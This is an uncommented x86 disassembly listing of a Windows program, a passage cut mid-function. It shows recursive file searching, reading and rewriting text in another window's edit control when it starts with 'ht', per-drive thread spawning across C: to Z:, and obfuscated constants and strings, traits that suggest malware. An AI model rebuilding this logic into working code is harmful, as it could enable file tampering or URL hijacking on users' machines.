lea eax, [ebp+var_242]
push eax
call sub_43D16C
add esp, 20h
jmp short loc_43D4A4
; ---------------------------------------------------------------------------
loc_43D435: ; CODE XREF: sub_43D16C+33A�j
lea eax, [ebp+var_13E]
push eax
push ebx
call ds:dword_447FB4 ; FindNextFileA
mov edi, eax
or edi, edi
jnz short loc_43D466
mov eax, [ebp+var_248]
add eax, ds:dword_44C818
push eax
call ds:dword_44C80C
pop ecx
push ebx
call ds:dword_4495BC ; FindClose
jmp short loc_43D4A8
; ---------------------------------------------------------------------------
loc_43D466: ; CODE XREF: sub_43D16C+2DB�j
cmp [ebp+var_112], 2Eh
jz short loc_43D4A4
push offset byte_44E49B
call sub_43AC82
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_44C810
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_43D16C
add esp, 20h
loc_43D4A4: ; CODE XREF: sub_43D16C+28C�j
; sub_43D16C+2C7�j ...
or edi, edi
jnz short loc_43D435
loc_43D4A8: ; CODE XREF: sub_43D16C+27F�j
; sub_43D16C+2F8�j
pop edi
pop esi
pop ebx
leave
retn
sub_43D16C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D4AD proc near ; CODE XREF: sub_43AB3B+137�p
; sub_43D4AD+27C�p ...
var_26C = dword ptr -26Ch
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 0
call ds:dword_44C80C
xor ebx, ebx
inc ebx
push offset byte_44E493
call sub_43AC82
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44C810
add esp, 14h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_44A21C ; FindFirstFileA
mov [ebp+var_248], eax
mov ecx, dword_44D230
sub ecx, 6
neg ecx
cmp eax, ecx
jnz loc_43D6DD
mov eax, dword_44D1C8
sub eax, 2
cmp [ebp+arg_20], eax
ja loc_43D7A6
mov eax, dword_44D208
add eax, 3FAh
cmp [ebp+arg_24], eax
jnb short loc_43D54C
movsx eax, word_44D144
mov edx, dword_44D16C
lea eax, [eax+edx+99h]
cmp [ebp+arg_24], eax
jnz loc_43D7A6
loc_43D54C: ; CODE XREF: sub_43D4AD+80�j
movsx eax, word_44D120
add eax, 30D37h
cmp [ebp+arg_24], eax
ja loc_43D7A6
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call ds:dword_44C960 ; CompareFileTime
mov [ebp+var_260], eax
movsx eax, word_44D12C
add eax, dword_44D104
sub eax, 0Ch
cmp [ebp+var_260], eax
jge short loc_43D59A
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_43D5A5
; ---------------------------------------------------------------------------
loc_43D59A: ; CODE XREF: sub_43D4AD+DE�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_43D5A5: ; CODE XREF: sub_43D4AD+EB�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call ds:dword_44C958 ; FileTimeToSystemTime
mov eax, dword_44D24C
mov edx, dword_44D17C
mov ecx, dword_44D0BC
mov [ebp+var_26C], ecx
movzx esi, [ebp+var_24E]
movzx edi, [ebp+var_250]
movsx ecx, word_44D1B8
lea eax, [eax+ecx+2Eh]
mov ecx, edi
imul ecx, eax
mov eax, esi
add eax, ecx
movzx ecx, [ebp+var_252]
mov esi, dword_44D1D0
lea edx, [edx+esi+0Ah]
imul ecx, edx
movsx edx, word_44D0E4
mov esi, [ebp+var_26C]
lea edx, [edx+esi+38h]
imul ecx, edx
add eax, ecx
movzx edx, [ebp+var_256]
mov ecx, dword_44D1C8
add ecx, 1Ch
imul edx, ecx
movsx ecx, word_44D090
add ecx, 13h
imul edx, ecx
mov ecx, dword_44D214
add ecx, 3Bh
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_258]
mov ecx, dword_44D1A0
lea ecx, [esi+ecx+0Ah]
imul edx, ecx
mov ecx, dword_44D0FC
add ecx, 17h
imul edx, ecx
mov ecx, dword_44D24C
add ecx, 0Fh
imul edx, ecx
mov ecx, dword_44D17C
add ecx, 33h
imul edx, ecx
add eax, edx
mov [ebp+var_25C], eax
mov edx, ds:dword_446028
cmp eax, edx
ja loc_43D7A6
sub edx, eax
mov eax, dword_44D238
add eax, 0Bh
cmp edx, eax
jnb loc_43D7A6
mov eax, dword_44D19C
add eax, 9Bh
cmp [ebp+arg_24], eax
jz short loc_43D6CB
push 0
push [ebp+arg_0]
call sub_43EB7A
add esp, 8
jmp loc_43D7A6
; ---------------------------------------------------------------------------
loc_43D6CB: ; CODE XREF: sub_43D4AD+20A�j
push 1
push [ebp+arg_0]
call sub_43EB7A
add esp, 8
jmp loc_43D7A6
; ---------------------------------------------------------------------------
loc_43D6DD: ; CODE XREF: sub_43D4AD+5C�j
cmp [ebp+var_112], 2Eh
jz loc_43D7A2
push offset word_44E48A
call sub_43AC82
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44C810
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_43D4AD
add esp, 158h
jmp short loc_43D7A2
; ---------------------------------------------------------------------------
loc_43D736: ; CODE XREF: sub_43D4AD+2F7�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call ds:dword_447FB4 ; FindNextFileA
mov ebx, eax
or ebx, ebx
jz short loc_43D7A6
cmp [ebp+var_112], 2Eh
jz short loc_43D7A2
push offset byte_44E481
call sub_43AC82
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44C810
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_43D4AD
add esp, 158h
loc_43D7A2: ; CODE XREF: sub_43D4AD+237�j
; sub_43D4AD+287�j ...
or ebx, ebx
jnz short loc_43D736
loc_43D7A6: ; CODE XREF: sub_43D4AD+6D�j
; sub_43D4AD+99�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43D4AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D7AB proc near ; CODE XREF: sub_43A6D4+62�p
var_1010 = byte ptr -1010h
var_100C = byte ptr -100Ch
var_1003 = byte ptr -1003h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_445950
push ebx
push esi
push edi
push offset byte_44E46F
call sub_43AC82
pop ecx
push 0
push eax
push 0
push [ebp+arg_0]
call ds:dword_44C814 ; FindWindowExA
mov edi, eax
or edi, edi
jnz short loc_43D7DD
mov edi, [ebp+arg_0]
loc_43D7DD: ; CODE XREF: sub_43D7AB+2D�j
push offset byte_44E459
call sub_43AC82
pop ecx
push 0
push eax
push 0
push edi
call ds:dword_44C814 ; FindWindowExA
mov edi, eax
lea eax, [ebp+var_FFF]
push eax
push 0FFFh
push 0Dh
push edi
call ds:dword_446014 ; SendMessageA
mov eax, dword_44D0D4
cmp [ebp+eax+var_FFF], 20h
jnz short loc_43D836
mov eax, dword_44D108
movsx edx, word_44D1DC
add eax, edx
cmp [ebp+eax+var_1010], 20h
jz loc_43D8E5
loc_43D836: ; CODE XREF: sub_43D7AB+6D�j
mov eax, dword_44D17C
add eax, dword_44D1B4
cmp [ebp+eax+var_100C], 68h
jnz short loc_43D85E
mov eax, dword_44D0AC
cmp [ebp+eax+var_1003], 74h
jz loc_43D8E5
loc_43D85E: ; CODE XREF: sub_43D7AB+9E�j
lea ecx, [ebp+var_FFF]
or eax, 0FFFFFFFFh
loc_43D867: ; CODE XREF: sub_43D7AB+C1�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D867
mov ebx, dword_44D16C
add ebx, 6
add ebx, dword_44D1AC
cmp eax, ebx
jb short loc_43D8E5
push offset dword_44E454
call sub_43AC82
mov esi, dword_44D09C
add esi, 3
push esi
push eax
lea esi, [ebp+var_FFF]
push esi
call sub_444D98
add esp, 10h
movsx ebx, word_44D21C
mov edx, dword_44D1E0
lea ebx, [ebx+edx+0FFF8h]
cmp eax, ebx
jnz short loc_43D8E5
push offset word_44E44E
call sub_43AC82
pop ecx
push eax
mov esi, dword_44D0DC
movsx ebx, word_44D204
add esi, ebx
sub esi, 6
push esi
push 0Ch
push edi
call ds:dword_446014 ; SendMessageA
loc_43D8E5: ; CODE XREF: sub_43D7AB+85�j
; sub_43D7AB+AD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43D7AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D8EA proc near ; DATA XREF: sub_43BE21+EE3�o
; sub_43BE21+F33�o ...
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_219 = byte ptr -219h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_10C = byte ptr -10Ch
var_106 = byte ptr -106h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov eax, ebx
cmp eax, 100h
jz short loc_43D91B
jl loc_43DE70
cmp eax, 111h
jz loc_43D9B0
jmp loc_43DE70
; ---------------------------------------------------------------------------
loc_43D91B: ; CODE XREF: sub_43D8EA+19�j
cmp [ebp+arg_8], 9
jnz loc_43DE70
mov edi, dword_44D1C4
dec edi
jmp short loc_43D999
; ---------------------------------------------------------------------------
loc_43D92E: ; CODE XREF: sub_43D8EA+BF�j
mov eax, 30h
mul edi
mov [ebp+var_208], eax
cmp ds:dword_44A550[eax], esi
jnz short loc_43D963
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
push ds:dword_44A554[eax]
call ds:dword_4499FC ; SetFocus
jmp loc_43DE70
; ---------------------------------------------------------------------------
loc_43D963: ; CODE XREF: sub_43D8EA+58�j
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
cmp ds:dword_44A554[eax], esi
jnz short loc_43D998
mov eax, 30h
mul edi
mov [ebp+var_210], eax
push ds:dword_44A558[eax]
call ds:dword_4499FC ; SetFocus
jmp loc_43DE70
; ---------------------------------------------------------------------------
loc_43D998: ; CODE XREF: sub_43D8EA+8D�j
inc edi
loc_43D999: ; CODE XREF: sub_43D8EA+42�j
mov eax, dword_44D1A8
add eax, 58h
add eax, dword_44D22C
cmp edi, eax
jb short loc_43D92E
jmp loc_43DE70
; ---------------------------------------------------------------------------
loc_43D9B0: ; CODE XREF: sub_43D8EA+26�j
mov edi, dword_44D0C8
sub edi, 2
jmp short loc_43D9D5
; ---------------------------------------------------------------------------
loc_43D9BB: ; CODE XREF: sub_43D8EA+F5�j
mov eax, 30h
mul edi
mov [ebp+var_208], eax
mov eax, ds:dword_44A55C[eax]
cmp [ebp+arg_C], eax
jz short loc_43D9E1
inc edi
loc_43D9D5: ; CODE XREF: sub_43D8EA+CF�j
mov eax, dword_44D224
add eax, 5Fh
cmp edi, eax
jb short loc_43D9BB
loc_43D9E1: ; CODE XREF: sub_43D8EA+E8�j
mov eax, dword_44D094
add eax, 62h
cmp edi, eax
jz loc_43DE70
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
push ds:dword_44A548[eax]
call ds:dword_44CD88 ; GetWindowTextA
mov eax, dword_44D17C
add eax, dword_44D09C
mov byte ptr [ebp+eax+var_210+2], 4Bh
mov eax, dword_44D0E0
mov edx, dword_44D1F4
add edx, dword_44D0A4
sub edx, 0Ch
mov byte ptr [ebp+eax+var_208+3], dl
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_446024
add esp, 8
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_210], eax
push ds:dword_44A550[eax]
call ds:dword_44CD88 ; GetWindowTextA
movsx eax, word_44D194
movsx eax, [ebp+eax+var_10C]
movsx edx, word_44D120
movsx ecx, word_44D164
add edx, ecx
sub edx, 0Dh
cmp eax, edx
jnz short loc_43DAF0
push offset byte_44E42B
call sub_43AC82
pop ecx
mov edx, dword_44D188
movsx ecx, word_44D0E4
add edx, ecx
sub edx, 0Bh
push edx
push 0
push eax
push 0
call ds:dword_44C820 ; MessageBoxA
mov eax, 30h
mul edi
mov [ebp+var_214], eax
push ds:dword_44A550[eax]
call ds:dword_4499FC ; SetFocus
jmp loc_43DE70
; ---------------------------------------------------------------------------
loc_43DAF0: ; CODE XREF: sub_43D8EA+1BC�j
push offset word_44E426
call sub_43AC82
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_446024
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_446024
add esp, 14h
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_214], eax
push ds:dword_44A554[eax]
call ds:dword_44CD88 ; GetWindowTextA
mov eax, dword_44D1E0
movsx edx, word_44D12C
add eax, edx
movsx eax, [ebp+eax+var_10C]
mov edx, dword_44D1EC
sub edx, 6
cmp eax, edx
jnz short loc_43DBA8
push offset dword_44E404
call sub_43AC82
pop ecx
movsx edx, word_44D21C
sub edx, 6
push edx
push 0
push eax
push 0
call ds:dword_44C820 ; MessageBoxA
mov eax, 30h
mul edi
mov [ebp+var_218], eax
push ds:dword_44A554[eax]
call ds:dword_4499FC ; SetFocus
jmp loc_43DE70
; ---------------------------------------------------------------------------
loc_43DBA8: ; CODE XREF: sub_43D8EA+27C�j
push offset byte_44E3FF
call sub_43AC82
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_446024
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_446024
add esp, 14h
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_218], eax
push ds:dword_44A558[eax]
call ds:dword_44CD88 ; GetWindowTextA
movsx eax, word_44D1F0
add eax, dword_44D09C
movsx eax, [ebp+eax+var_106]
movsx edx, word_44D110
cmp eax, edx
jz loc_43DD4F
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43DC2A: ; CODE XREF: sub_43D8EA+345�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DC2A
movsx ecx, word_44D180
sub ecx, 1
cmp eax, ecx
jb loc_43DD4F
mov eax, dword_44D248
add eax, dword_44D0E0
sub eax, 2
mov [ebp+var_105], al
jmp short loc_43DC7B
; ---------------------------------------------------------------------------
loc_43DC59: ; CODE XREF: sub_43D8EA+3AA�j
movzx eax, [ebp+var_105]
mov al, [ebp+eax+var_103]
cmp al, 30h
jl short loc_43DC6F
cmp al, 39h
jle short loc_43DC74
loc_43DC6F: ; CODE XREF: sub_43D8EA+37F�j
jmp loc_43DD4F
; ---------------------------------------------------------------------------
loc_43DC74: ; CODE XREF: sub_43D8EA+383�j
add [ebp+var_105], 1
loc_43DC7B: ; CODE XREF: sub_43D8EA+36D�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43DC84: ; CODE XREF: sub_43D8EA+39F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DC84
movzx ecx, [ebp+var_105]
cmp ecx, eax
jb short loc_43DC59
movsx eax, word_44D11C
add eax, dword_44D22C
sub eax, 8
mov [ebp+var_104], al
jmp short loc_43DD2B
; ---------------------------------------------------------------------------
loc_43DCAE: ; CODE XREF: sub_43D8EA+45A�j
mov al, [ebp+var_104]
mov [ebp+var_219], al
jmp short loc_43DCE5
; ---------------------------------------------------------------------------
loc_43DCBC: ; CODE XREF: sub_43D8EA+414�j
movzx eax, [ebp+var_219]
movsx eax, [ebp+eax+var_103]
movzx edx, [ebp+var_104]
movsx edx, [ebp+edx+var_103]
cmp eax, edx
jnz short loc_43DD00
add [ebp+var_219], 1
loc_43DCE5: ; CODE XREF: sub_43D8EA+3D0�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43DCEE: ; CODE XREF: sub_43D8EA+409�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DCEE
movzx ecx, [ebp+var_219]
cmp ecx, eax
jb short loc_43DCBC
loc_43DD00: ; CODE XREF: sub_43D8EA+3F2�j
movzx eax, [ebp+var_219]
movzx edx, [ebp+var_104]
sub eax, edx
movsx edx, word_44D0B8
add edx, dword_44D1A0
sub edx, 6
cmp eax, edx
jg short loc_43DD4F
add [ebp+var_104], 1
loc_43DD2B: ; CODE XREF: sub_43D8EA+3C2�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43DD34: ; CODE XREF: sub_43D8EA+44F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DD34
movzx ecx, [ebp+var_104]
cmp ecx, eax
jb loc_43DCAE
jmp loc_43DDE9
; ---------------------------------------------------------------------------
loc_43DD4F: ; CODE XREF: sub_43D8EA+331�j
; sub_43D8EA+353�j ...
mov eax, dword_44D24C
add eax, 7BEh
add eax, dword_44D108
push eax
call ds:dword_44C80C
push offset word_44E3C6
call sub_43AC82
mov [ebp-21Ch], eax
push offset byte_44E3AF
call sub_43AC82
mov edx, dword_44D1BC
add edx, dword_44D234
sub edx, 6
push edx
push eax
mov edx, [ebp-21Ch]
push edx
push 0
call ds:dword_44C820 ; MessageBoxA
push offset byte_44E3AB
call sub_43AC82
add esp, 10h
push eax
mov eax, 30h
mul edi
mov [ebp+var_220], eax
mov edx, eax
push ds:dword_44A558[edx]
call ds:dword_44C834 ; SetWindowTextA
mov eax, 30h
mul edi
mov [ebp+var_224], eax
push ds:dword_44A558[eax]
call ds:dword_4499FC ; SetFocus
jmp loc_43DE70
; ---------------------------------------------------------------------------
loc_43DDE9: ; CODE XREF: sub_43D8EA+460�j
push offset word_44E3A6
call sub_43AC82
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_446024
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_446024
mov eax, 30h
mul edi
mov [ebp+var_228], eax
push ds:dword_44A548[eax]
call ds:dword_44A1E8 ; DestroyWindow
lea eax, [ebp+var_204]
push eax
call ds:dword_447000
add esp, 18h
push 5
mov eax, 30h
mul edi
mov [ebp+var_22C], eax
push ds:dword_44A544[eax]
call ds:dword_44C838 ; ShowWindow
mov eax, 30h
mul edi
mov [ebp+var_230], eax
and ds:dword_44A540[eax], 0
loc_43DE70: ; CODE XREF: sub_43D8EA+1B�j
; sub_43D8EA+2C�j ...
mov edi, dword_44D104
sub edi, 4
jmp loc_43DF52
; ---------------------------------------------------------------------------
loc_43DE7E: ; CODE XREF: sub_43D8EA+672�j
mov eax, 30h
mul edi
mov [ebp+var_8], eax
cmp esi, ds:dword_44A550[eax]
jnz short loc_43DEB5
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_C], eax
push ds:dword_44A560[eax]
call ds:dword_44C7DC ; CallWindowProcA
jmp loc_43DF62
; ---------------------------------------------------------------------------
loc_43DEB5: ; CODE XREF: sub_43D8EA+5A5�j
mov eax, 30h
mul edi
mov [ebp+var_10], eax
cmp esi, ds:dword_44A554[eax]
jnz short loc_43DEE9
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_14], eax
push ds:dword_44A564[eax]
call ds:dword_44C7DC ; CallWindowProcA
jmp short loc_43DF62
; ---------------------------------------------------------------------------
loc_43DEE9: ; CODE XREF: sub_43D8EA+5DC�j
mov eax, 30h
mul edi
mov [ebp+var_18], eax
cmp esi, ds:dword_44A558[eax]
jnz short loc_43DF1D
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_1C], eax
push ds:dword_44A568[eax]
call ds:dword_44C7DC ; CallWindowProcA
jmp short loc_43DF62
; ---------------------------------------------------------------------------
loc_43DF1D: ; CODE XREF: sub_43D8EA+610�j
mov eax, 30h
mul edi
mov [ebp+var_20], eax
cmp esi, ds:dword_44A54C[eax]
jnz short loc_43DF51
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_24], eax
push ds:dword_44A56C[eax]
call ds:dword_44C7DC ; CallWindowProcA
jmp short loc_43DF62
; ---------------------------------------------------------------------------
loc_43DF51: ; CODE XREF: sub_43D8EA+644�j
inc edi
loc_43DF52: ; CODE XREF: sub_43D8EA+58F�j
mov eax, dword_44D184
add eax, 63h
cmp edi, eax
jb loc_43DE7E
loc_43DF62: ; CODE XREF: sub_43D8EA+5C6�j
; sub_43D8EA+5FD�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_43D8EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DF69 proc near ; CODE XREF: sub_44318C+D9�p
; sub_44318C+116�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 2Bh
mov edx, 2FA0BE83h
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
mov ebx, edi
mov [ebp+arg_0], bl
movzx eax, [ebp+arg_0]
mov edx, dword_44D0A8
sub edx, 4
cmp eax, edx
jnz short loc_43DFA4
mov eax, 65h
jmp short loc_43E020
; ---------------------------------------------------------------------------
loc_43DFA4: ; CODE XREF: sub_43DF69+32�j
movzx eax, [ebp+arg_0]
mov edx, dword_44D094
dec edx
cmp eax, edx
jnz short loc_43DFBA
mov eax, 79h
jmp short loc_43E020
; ---------------------------------------------------------------------------
loc_43DFBA: ; CODE XREF: sub_43DF69+48�j
movzx eax, [ebp+arg_0]
mov edx, dword_44D0AC
add edx, dword_44D198
sub edx, 0Ch
cmp eax, edx
jnz short loc_43DFD8
mov eax, 75h
jmp short loc_43E020
; ---------------------------------------------------------------------------
loc_43DFD8: ; CODE XREF: sub_43DF69+66�j
movzx eax, [ebp+arg_0]
mov edx, dword_44D1B0
sub edx, 4
cmp eax, edx
jnz short loc_43DFF0
mov eax, 69h
jmp short loc_43E020
; ---------------------------------------------------------------------------
loc_43DFF0: ; CODE XREF: sub_43DF69+7E�j
movzx eax, [ebp+arg_0]
movsx edx, word_44D1F0
add edx, 2
cmp eax, edx
jnz short loc_43E009
mov eax, 6Fh
jmp short loc_43E020
; ---------------------------------------------------------------------------
loc_43E009: ; CODE XREF: sub_43DF69+97�j
movzx eax, [ebp+arg_0]
movsx edx, word_44D148
add edx, 5
cmp eax, edx
jnz short loc_43E020
mov eax, 61h
loc_43E020: ; CODE XREF: sub_43DF69+39�j
; sub_43DF69+4F�j ...
pop edi
pop ebx
leave
retn
sub_43DF69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E024 proc near ; CODE XREF: sub_43F09C+BC�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
mov eax, dword_44D14C
sub eax, 8
push eax
push [ebp+arg_0]
call ds:dword_44B804 ; VirtualFree
pop ebp
retn
sub_43E024 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43E040 proc near ; DATA XREF: sub_43A39F+2BD�o
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_E = byte ptr -0Eh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, 43h
jmp short loc_43E059
; ---------------------------------------------------------------------------
loc_43E050: ; CODE XREF: sub_43E040+1C�j
and ds:dword_44C970[esi*4], 0
inc esi
loc_43E059: ; CODE XREF: sub_43E040+E�j
cmp esi, 5Ah
jbe short loc_43E050
loc_43E05E: ; CODE XREF: sub_43E040+19C�j
mov edi, 43h
jmp loc_43E1C1
; ---------------------------------------------------------------------------
loc_43E068: ; CODE XREF: sub_43E040+184�j
mov eax, dword_44D15C
movsx edx, word_44D160
add eax, edx
sub eax, 6
push eax
call ds:dword_44C80C
push offset word_44E39E
call sub_43AC82
push edi
push eax
lea ebx, [ebp+var_E]
push ebx
call ds:dword_44C810
add esp, 14h
cmp ds:dword_44C970[edi*4], 0
jz short loc_43E0DD
mov eax, dword_44D244
sub eax, 9
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ds:dword_44C970[edi*4]
call ds:dword_44C82C ; GetExitCodeThread
cmp [ebp+var_14], 103h
jz short loc_43E0DD
push ds:dword_44C970[edi*4]
call ds:dword_44B82C ; CloseHandle
and ds:dword_44C970[edi*4], 0
loc_43E0DD: ; CODE XREF: sub_43E040+61�j
; sub_43E040+86�j
lea eax, [ebp+var_E]
push eax
call ds:dword_44C844 ; GetDriveTypeA
mov [ebp+var_4], eax
cmp eax, 3
jz short loc_43E11D
cmp eax, 4
jz short loc_43E11D
cmp eax, 2
jz short loc_43E11D
cmp ds:dword_44C970[edi*4], 0
jz loc_43E1C0
movsx ebx, word_44D23C
sub ebx, 5
mov ds:dword_4495E0[edi*4], ebx
jmp loc_43E1C0
; ---------------------------------------------------------------------------
loc_43E11D: ; CODE XREF: sub_43E040+AD�j
; sub_43E040+B2�j ...
push 1
call ds:dword_447FB0 ; SetErrorMode
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_E]
push eax
call ds:dword_449088 ; GetDiskFreeSpaceA
mov ebx, dword_44D13C
sub ebx, 8
cmp eax, ebx
jnz short loc_43E172
cmp ds:dword_44C970[edi*4], 0
jz short loc_43E1C0
movsx ebx, word_44D120
movsx edx, word_44D0B4
add ebx, edx
sub ebx, 0Dh
mov ds:dword_4495E0[edi*4], ebx
jmp short loc_43E1C0
; ---------------------------------------------------------------------------
loc_43E172: ; CODE XREF: sub_43E040+10A�j
cmp ds:dword_44C970[edi*4], 0
jnz short loc_43E1C0
mov ds:dword_4495E0[edi*4], edi
lea eax, [ebp+var_28]
push eax
mov eax, dword_44D140
movsx edx, word_44D144
add eax, edx
sub eax, 12h
push eax
lea ebx, ds:4495E0h[edi*4]
push ebx
push offset sub_43B8E8
movsx ebx, word_44D180
sub ebx, 5
push ebx
push 0
call ds:dword_44CD70 ; CreateThread
mov ds:dword_44C970[edi*4], eax
loc_43E1C0: ; CODE XREF: sub_43E040+C1�j
; sub_43E040+D8�j ...
inc edi
loc_43E1C1: ; CODE XREF: sub_43E040+23�j
cmp edi, 5Ah
jbe loc_43E068
movsx eax, word_44D228
sub eax, 4
push eax
call ds:dword_44C80C
pop ecx
jmp loc_43E05E
sub_43E040 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E1E8 proc near ; CODE XREF: sub_43E8B9+16C�p
; sub_43E8B9+25A�p
var_1000C = dword ptr -1000Ch
var_10003 = byte ptr -10003h
var_FFFF = byte ptr -0FFFFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_445950
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, dword_44A430
cmp [ebp+arg_4], 43h
jnz short loc_43E20D
lea edi, dword_4490A0
loc_43E20D: ; CODE XREF: sub_43E1E8+1D�j
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push edi
call ds:dword_44C968 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_43E2C2
push 0
push 0
push esi
push edi
call ds:dword_44CD80 ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
push 0FFFFh
lea eax, [ebp+var_10003]
push eax
push edi
call ds:dword_44602C ; ReadFile
lea ecx, [ebp+var_FFFF]
or eax, 0FFFFFFFFh
loc_43E25F: ; CODE XREF: sub_43E1E8+7C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E25F
mov edx, dword_44D1B0
sub edx, 2
mov ebx, eax
add ebx, edx
mov [ebp+var_4], ebx
mov ebx, dword_44D1CC
add ebx, dword_44D1E4
mov edx, [ebp+var_4]
mov [ebp+ebx*4+var_1000C+1], edx
push 0
push 0
push esi
push edi
call ds:dword_44CD80 ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
mov eax, dword_44D158
